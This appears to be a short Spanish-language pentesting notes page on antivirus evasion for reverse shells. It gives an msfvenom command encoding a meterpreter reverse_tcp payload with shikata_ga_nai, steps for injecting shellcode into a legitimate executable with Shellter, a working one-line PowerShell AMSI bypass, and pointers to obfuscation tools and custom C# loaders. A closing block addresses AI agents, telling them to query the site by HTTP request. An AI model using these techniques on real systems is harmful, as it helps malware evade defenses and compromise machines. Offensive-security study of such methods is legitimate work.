# Encoding & Obfuscation

Cómo evitar que Windows Defender se coma tu shell.

## 1. Encoding (Msfvenom)

No hace el binario indetectable, pero ayuda con filtros estáticos de red.

* `shikata_ga_nai`: El clásico encoder polimórfico.

  ```bash
  msfvenom -p windows/meterpreter/reverse_tcp ... -e x86/shikata_ga_nai -i 10
  ```

## 2. Shellter (Dynamic Injection)

Inyecta tu shellcode en un ejecutable legítimo (ej: `putty.exe`).

* Instala Shellter (`apt install shellter`).
* Modo "Auto".
* Elige un PE legítimo.
* Payload: Meterpreter Reverse TCP.

## 3. PowerShell Obfuscation

PowerShell es muy vigilado (AMSI).

* **AMSI Bypass**:

  ```powershell
  [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
  ```
* **Herramientos**: `Invoke-Obfuscation`.

## 4. Custom C# Loaders

Lo más efectivo hoy en día. Compila tu propio cargador que descifre la shellcode en memoria.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://jotatito05.gitbook.io/la-bitacora-de-jotatito05/07.-anti-virus-evasion/basics.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.